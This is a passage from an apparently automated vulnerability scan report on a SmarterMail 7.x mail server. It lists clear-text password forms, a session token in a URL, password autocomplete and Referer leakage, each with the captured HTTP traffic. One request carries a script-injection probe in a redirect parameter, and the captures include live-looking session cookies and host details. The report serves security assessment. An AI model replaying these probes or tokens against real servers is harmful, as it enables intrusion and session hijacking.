<td id="ctl00_MPH_wucUserSettings_txtNP_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtNP_SettingText" type="password" id="ctl00_MPH_wucUserSettings_txtNP_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...
<td id="ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtNewPasswordConfirmed_SettingText" type="password" id="ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...

5.4. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSmtpAccount.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmSmtpAccount.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Main/frmSmtpAccount.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:12 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10003
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SMTP Accounts - hoytllc.
...[SNIP]...
<body class="" dir="ltr">
   <form method="post" action="frmSmtpAccount.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td id="ctl00_MPH_txtPassword_Setting" class="Setting"><input name="ctl00$MPH$txtPassword_SettingText" type="password" id="ctl00_MPH_txtPassword_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...

6. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /FileStorageUpload.ashx

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

POST /FileStorageUpload.ashx?uploadValidationToken=98dee8a7f3fc415c919a873e64836960&pathField=Root+Folder%5c&userField=euser&domainField=hoytllc.com&name=fastdial.net-netsparker.pdf&chunk=1&chunks=3&offset=102400&file_size=224593 HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf
content-type: application/octet-stream
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserStorage"}
Content-Length: 102400

.I^.cw!.%..J..%.|Q..X...[s .\r..%.r.\..OZ.q.4..:......A.>d.yRz....H.$..3s/.4.!.Y.2.9=..^.kr..*c.    8l.5.z.t.}[X........-.
.>..Wr..9...j.[......sXV$..9k.^r..Ir.DH...Y.g.....Cr.J....Q....Sr.^.r.9T....'...
...[SNIP]...

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:11:42 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Connection: Close


</pre></table></table></table></table></table></font></font></font></font></font></i></i></i></i></i></b></b></b></b></b></u></u></u></u></u><p>&nbsp;</p><hr>

<html>
<head>
<title
...[SNIP]...

7. Password field with autocomplete enabled  previous  next
There are 3 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:18:49 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7968


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<body class="Login" dir="ltr">
   <form method="post" action="Login.aspx" id="aspnetForm">
<div>
...[SNIP]...
</div>
       <input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
   </div>
...[SNIP]...

7.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx?autologin=false HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}; ASP.NET_SessionId=soujru3czj1bxs55eeesj055; settings=empty

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:11 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<body class="Login" dir="ltr">
   <form method="post" action="Login.aspx?autologin=false" id="aspnetForm">
<div>
...[SNIP]...
</div>
       <input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
   </div>
...[SNIP]...

7.3. http://vulnerable.SmarterMail 7.x.host:9998/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?RedirectUrl=%2fMain%2ffrmStoredFiles.aspx%3fpath%3d4e2dc%3cscript%3ealert(1)%3c%2fscript%3eba99eeeec80 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}; ASP.NET_SessionId=soujru3czj1bxs55eeesj055

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:37:54 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<body class="Login" dir="ltr">
   <form method="post" action="login.aspx?RedirectUrl=%2fMain%2ffrmStoredFiles.aspx%3fpath%3d4e2dc%3cscript%3ealert(1)%3c%2fscript%3eba99eeeec80" id="aspnetForm">
<div>
...[SNIP]...
</div>
       <input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
   </div>
...[SNIP]...

8. Cross-domain Referer leakage  previous  next
There are 11 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


8.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Login.aspx?autologin=false HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}; ASP.NET_SessionId=soujru3czj1bxs55eeesj055; settings=empty

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:11 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div class="LoginLinks">
                       <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
...[SNIP]...

8.2. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmPrintPreview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmPrintPreview.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Reports/frmPrintPreview.aspx?level=user&type= HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:59 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2852
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Print Prev
...[SNIP]...
</title>

   <script type="text/javascript" src="http://code.jquery.com/jquery-1.2.6-vsdoc.js"></script>
...[SNIP]...

8.3. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1293362628","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 23:12:31 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=6960a651633f4a519c9cdf62f3c19135.png' /></div>
...[SNIP]...

8.4. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&MyReports HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:59 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27863
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=b4c70133c7824621b9d0132ea6ebfae1.png' /></div>
...[SNIP]...

8.5. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 01:28:48 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27865


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=694557ada6074a0db34e1b246b74476e.png' /></div>
...[SNIP]...

8.6. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1541853595","TopBarSection":"UserReports","RootLPSize":300}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:24:51 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=b98f605d263648818d10f94c6b15a5d5.png' /></div>
...[SNIP]...

8.7. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:21:29 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=bec960cfde0a4a9a9a53e02f1bf19d16.png' /></div>
...[SNIP]...

8.8. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:52:25 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27865


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=aedf2a0a2d164f848898a52049f7a417.png' /></div>
...[SNIP]...

8.9. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:58:32 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27947


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=38a43a866ec9493f98aba52d99b457dd.png' /></div>
...[SNIP]...

8.10. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddReportItem.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmAddReportItem.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /UserControls/Popups/frmAddReportItem.aspx?level=user& HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
